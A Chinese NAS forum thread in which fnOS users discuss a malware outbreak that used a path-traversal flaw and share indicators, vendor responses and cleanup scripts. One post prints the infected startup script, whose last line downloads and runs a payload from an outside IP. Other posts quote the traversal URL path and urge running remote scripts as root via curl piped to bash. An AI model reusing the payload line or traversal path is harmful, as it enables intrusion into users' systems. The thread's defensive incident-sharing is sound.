fnos 恶意程序分析

fn-sky

akbiubiu 发表于 2026-1-31 11:44
和http没关系飞牛前几个版本有越权路径的0day 映射到公网的nas在域名后面加/app-center-static/serviceicon ...

当前版本1.1.15，测试了一下，内网ip和fn connect要么是找不到页面，要么是跳转登录页，但是，我有一条穿透，域名+这一段，提示404，暂时先把穿透关了保平安

success

徐坤鹏 发表于 2026-1-31 23:40
国内访问不了，要翻墙。

国内快速链接V2版本
先sudo -i

1. curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o /usr/local/bin/fnos_xxck1 && chmod +x /usr/local/bin/fnos_xxck1 && fnos_xxck1

复制代码

success

斯诺克王子 发表于 2026-1-31 15:27
执行报错了

国内快速链接V2版本
先sudo -i
curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o /usr/local/bin/fnos_xxck1 && chmod +x /usr/local/bin/fnos_xxck1 && fnos_xxck1

master-matt

mundane 发表于 2026-1-31 23:53
我的表现也是 1.应用商店APP升级失败  2.吸引升级失败  3.ssh去主机，ping任何域名失效  4. nslookup reg ...

一模一样，dns的配置更新生效依赖cat，病毒把cat命令改为cat2，就导致dns失效

hover

sheqibin 发表于 2026-1-31 14:01
被攻击的都是v4公网么？  我只有v6公网 有没有事

IPV4 IPV6都有风险 都有事 建议直接断网

nasplayer

独舞 发表于 2026-2-1 00:37
搞定了 用了脚本可以完全杀掉
curl -fsSL http://static2.fnnas.com/aptfix/listautostart.sh | bash  **
* ...

哦 这些命令哪儿来的？ 怎么还是飞牛官网上的？

bct2398

1.1.15版本路径已经是修复了的，用上面那个链接是打不开的

hover

如果只开了FN CONNECT是否会有路径穿越免登录访问数据 数据泄露的问题，这个有结论没？

王大宝¹⁸?

success 发表于 2026-2-1 00:51
国内快速链接V2版本
先sudo -i
curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o  ...

确实出现了cat命令失效的情况，所有的域名解析都是失败的，无法拉取大佬们制作的脚本

某摆烂咸鱼

飞牛社区主理人 发表于 2026-2-1 00:41
异常情况确定当天就针对该情况，推送了1.1.15更新，并发送了更新提醒。

存在严重的路径穿越漏洞，可以未授权访问nas任意文件，不去主动发通知经过用户升级，私底下偷偷修复然后把锅甩给http和中间人攻击，这就是你们处理问题的态度吗

你知不知道这种恶性0day漏洞是捂不住的，拖的越久口碑崩的越厉害。不如老老实实承认，发通告，哪家nas没有安全漏洞？

Kelsen

success 发表于 2026-2-1 00:51
国内快速链接V2版本
先sudo -i
curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o  ...

大佬 使用完v2版本清理后 重启再检查，刚开始是显示正常，过一会又连接151.240.13.91，然后被感染了和篡改文件里，请问有没有办法可以完全解决？

船桨不是地

success 发表于 2026-1-31 14:39
#一键检测修复工具
curl -ksSL https://us1.vvvvvv.de5.net/sh/fnos_xxck1.sh -o /usr/local/bin/fnos_xxc ...

使用后发现会将飞牛同步识别成恶意服务。

master-matt

好像又多了个恶意程序模块 async_memcpys 😭

Babbo

success 发表于 2026-2-1 00:51
国内快速链接V2版本
先sudo -i
curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o  ...

这个脚本在我这里似乎误报了/usr/trim/bin/wsdd2这个文件为恶意文件，我看了下，我这里的这个文件应该是正常的

free~burning

qiuser 发表于 2026-1-31 21:53
补充一个文件
root@Banas:~# md5sum /usr/sbin/gots
19884674cbcb47069ece9f81096c0e67  /usr/sbin/gots

对的 本来我也想补一下 dockers 这个文件的，你发现的比我早，费了好大劲才追踪到这个文件

free~burning

1337 发表于 2026-1-31 22:44
这个 http://x.x.x.x:5666(5667)/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../usr/tr ...

怎么办呢？这个文件要怎么处理呢？

星隅x

幸好我的纯v6的还没事，现在直接套了个雷池高强度防护

刘清白

我下载了个病毒样本，有兴趣的可以看看

附件：病毒样本-2026-2-1 02-58-01-密码123.rar

free~burning

刘清白 发表于 2026-2-1 03:17
我下载了个病毒样本，有兴趣的可以看看

附件：病毒样本-2026-2-1 02-58-01-密码123.rar

我也保留了这个。手动清干净了 才发现这里有大神的脚本😭。 太困了 💤

纯白色的背带

不都说雷池好用吗，套一个试试，应该是还是有点用的呢

关言己

关言己 发表于 2026-2-1 00:49
看了下其他一切正常，就是/usr/trim/bin/trim_http_cgi这个文件存在，修改时间为25年6月10号，我系统在10月 ...

看错了，我这是trim_http_cgi不是trim_https_cgi

柳如嫣

飞牛社区主理人 发表于 2026-2-1 00:41
异常情况确定当天就针对该情况，推送了1.1.15更新，并发送了更新提醒。

明白飛牛的不易. 不過你也修復了問題, 而這問題的影響又這麼嚴重, 你好歹也在官網首頁標示一下, 讓大家盡早更新吧.

這一次令飛牛人氣掉了不少. 可惜了

关言己

xsllei 发表于 2026-1-31 22:56
几乎外网能访问的飞牛都中标了，不只是开放了5666 5667端口的  还有官方开FN的，  我用FRP反穿换了访问端口 ...

我看好像中的都是搭配爱快的？

夜夜夜夜耶

飞牛社区主理人 发表于 2026-1-31 12:41
感谢分享，分析很精彩，该问题官方已知，经过技术分析追踪该行为是是在公网暴露服务的情况下，开启http明文 ...

屁，和http没关系，不要甩锅。BUG不可避免，但不能没有直面BUG的勇气和担当。

wotemezuile

装飞牛，开始只是为了玩玩的，玩着玩着就玩大了，数据越来越多，特么这下梭哈了。

这次是低级的漏洞吧，飞牛也就是草台班子吧，发现了也不想法子及时通知用户，遮遮掩掩，拖拖拉拉。

nijpatin

现在更新1.1.18修复前面问题了吗？木马被修复了吗？现在还不敢开机

阿勇哥

独舞 发表于 2026-2-1 00:37
搞定了 用了脚本可以完全杀掉
curl -fsSL http://static2.fnnas.com/aptfix/listautostart.sh | bash  **
* ...

清理不干净，发现有链接到别的服务器地址去下载了恶意程序



root@AyongGe:~# cat /usr/trim/bin/system_startup.sh
#!/bin/bash

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"

if [ ! -f "$BACKUP" ]; then
if [ -f "$STATUS" ]; then
cp "
BACKUP"
fi
fi

if [ ! -f "$STATUS" ]; then
if [ -f "$BACKUP" ]; then
cp "
STATUS"
fi
fi

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

wget http://43.198.11.122/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp

飞牛社区主理人

hjz2358 发表于 2026-1-31 17:51
大佬能救救我吗，中招木马了：
hjz@hjz-fnOS:~$ cat /usr/trim/bin/system_startup.sh
#!/bin/bash

升级最新的系统版本

惊天小黑

推送1.1.18更新了

飞牛社区主理人

某摆烂咸鱼 发表于 2026-2-1 02:06
存在严重的路径穿越漏洞，可以未授权访问nas任意文件，不去主动发通知经过用户升级，私底下偷偷修复然后 ...

实在抱歉，因为漏洞需要在完全修复之后进行披露，没有办法第一时间进行公布。目前已推送1.1.18完全修复版本并发送安全更新通告

阿勇哥

wotemezuile 发表于 2026-2-1 09:05
装飞牛，开始只是为了玩玩的，玩着玩着就玩大了，数据越来越多，特么这下梭哈了。
这次是低级的漏洞吧，飞 ...

哥们，脚本地址发一下，谢谢

caolc

fun5201314 发表于 2026-1-31 20:54
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../ 漏洞还在

一早醒来天塌了。我NAS上还存有工作资料。。初步排查了下我打不开这个链接（访问是个lucky 404 页面，我用的lucky 反代 https访问）。前面说的cat命令也没有问题。现在提示有系统更新：1.1.1.8 更新后还有风险吗？ 实在不行，我转UNRAID 去了

wotemezuile

阿勇哥 发表于 2026-2-1 09:24
哥们，脚本地址发一下，谢谢

https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh

飞牛社区主理人

阿勇哥 发表于 2026-2-1 09:16
清理不干净，发现有链接到别的服务器地址去下载了恶意程序

已更新该特征

飞牛社区主理人

caolc 发表于 2026-2-1 09:25
一早醒来天塌了。我NAS上还存有工作资料。。初步排查了下我打不开这个链接（访问是个lucky 404 页面，我 ...

该漏洞最新版本已修复

飞牛社区主理人

nijpatin 发表于 2026-2-1 09:12
现在更新1.1.18修复前面问题了吗？木马被修复了吗？现在还不敢开机

1.1.18已修复已知漏洞，并添加了自动查杀木马

阿勇哥

wotemezuile 发表于 2026-2-1 09:26
https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh

--- [0/6] FnOS 系统漏洞检测 ---
[正常]   路径穿越漏洞检测通过 (默认端口及自定义端口)

--- [1/6] 网络连接与端口扫描 ---
[正常]   未发现连接到 IP: 45.95.212.102
[正常]   未发现连接到 IP: 151.240.13.91
[正常]   未发现连接到 IP: 43.198.11.122
[正常]   未发现连接到 IP: 103.248.152.136
[正常]   端口 57132 正常 (未被占用)

--- [2/6] 关键文件完整性扫描 ---
[正常]   文件未感染: /usr/bin/nginx
[正常]   文件未感染: /usr/sbin/gots
[正常]   文件未感染: /usr/trim/bin/trim_https_cgi
[正常]   文件未感染: /lib/modules/6.12.18-trim/snd_pcap.ko
[正常]   文件未感染: /usr/bin/dockers
[正常]   文件未感染: /usr/bin/SazW
[正常]   文件未感染: /usr/trim/bin/wsdd2
[正常]   文件未感染: /tmp/turmp

--- [3/6] 内核模块扫描 ---
[正常]   内核模块检查正常

--- [4/6] 服务与启动项扫描 ---
[危险] 发现恶意服务文件: /etc/systemd/system/trim_pap.service

--- [5/6] 深度 Cron & SSH 扫描 ---
[正常]   Crontab 定时任务检查正常
[正常]   SSH 公钥文件检查正常

xvyingfeng

DCr9nmaqFU14O 发表于 2026-1-31 09:30
确实是22号开始的，stat /usr/trim/bin/system_startup.sh 的输出，显示修改时间就是22号。感觉飞牛的登 ...

我的22突然应用中心都下载失败，系统更新也失败，修复也失败，然后我就重装了，不会那个时候就出问题了吧。。。

82280095

机器在另外一个地方，实在不想重装，我现在版本是 1.1.5 确认是中毒了，也清除不了，请问升级了 1.1.18 能不能清除掉这个病毒，实在不想重装

zSdawdaz

飞牛社区主理人 发表于 2026-1-31 14:06
不纯是公网原因，明文访问方式才是高风险的关键，有公网的情况下，强制HTTPS能避免当前情况 ...

跟http没啥关系，你们要把日志和防火墙功能做全，ipv6细化的市一级，不然以后漏洞事件源源不断

nijpatin

82280095 发表于 2026-2-1 10:12
机器在另外一个地方，实在不想重装，我现在版本是 1.1.5 确认是中毒了，也清除不了，请问升级了 1.1.18 能 ...

1.1.18说是修复了，也添加了自动杀木马。具体行不行不知道。但是升级是有必要的

zSdawdaz

惊天小黑 发表于 2026-1-31 07:42
这样设置可以不

没啥用，这次攻击的ip来自深圳，要细化到市才行

zSdawdaz

纯白色的背带 发表于 2026-2-1 03:39
不都说雷池好用吗，套一个试试，应该是还是有点用的呢

你这个貌似允许通过吧

LeoJ

飞牛社区主理人 发表于 2026-1-31 12:41
感谢分享，分析很精彩，该问题官方已知，经过技术分析追踪该行为是是在公网暴露服务的情况下，开启http明文 ...

自动查杀能力在哪里，没找到

zSdawdaz

关言己 发表于 2026-2-1 07:31
我看好像中的都是搭配爱快的？

反而要感谢爱快能看出连接数异常发现问题

NoTimeToWaste

nijpatin 发表于 2026-2-1 11:00
1.1.18说是修复了，也添加了自动杀木马。具体行不行不知道。但是升级是有必要的 ...

昨晚用论坛里其他大神给的脚本查杀一直删不干净，重启之后还存在木马。
凌晨更新了1.1.18
刚才检查了一遍已经没有木马了，看上去可行
但是已经不敢开公网访问了、害怕了

nijpatin

NoTimeToWaste 发表于 2026-2-1 11:26
昨晚用论坛里其他大神给的脚本查杀一直删不干净，重启之后还存在木马。
凌晨更新了1.1.18
刚才检查了一遍 ...

其实这次飞牛做的欠妥，这样让人害怕安全性。它要是发现问题第一时间出公告或者邮箱推送通知，然后告诫用户先断开公网等待更新修复.这样用户就安心多了，起码用户会觉得出了问题飞牛会通知你，让你断开网络，也是一种安全保障

Summer✊

nijpatin 发表于 2026-2-1 11:33
其实这次飞牛做的欠妥，这样让人害怕安全性。它要是发现问题第一时间出公告或者邮箱推送通知，然后告诫用 ...

是的，到现在为止微信用户群里也不愿意@用户尽快升级。为了不扩大舆情，让部分老版本用户继续**奔，这是最致命的。公关-1分。

肥牛藕丝

月光微暖冬亦凉 发表于 2026-1-31 11:19
套雷池吧 我很早就做了这个帖子 我套了雷池哪怕就开默认的防护级别也拦截了 这个IP估计已经上雷池黑名单了
...

我也是套了雷池，今天验证拦截了。

njzhx

Babbo 发表于 2026-2-1 02:37
这个脚本在我这里似乎误报了/usr/trim/bin/wsdd2这个文件为恶意文件，我看了下，我这里的这个文件应该是正 ...

我也是报这个文件有问题，但如何判断是否误报呢？  我打开是不少乱码。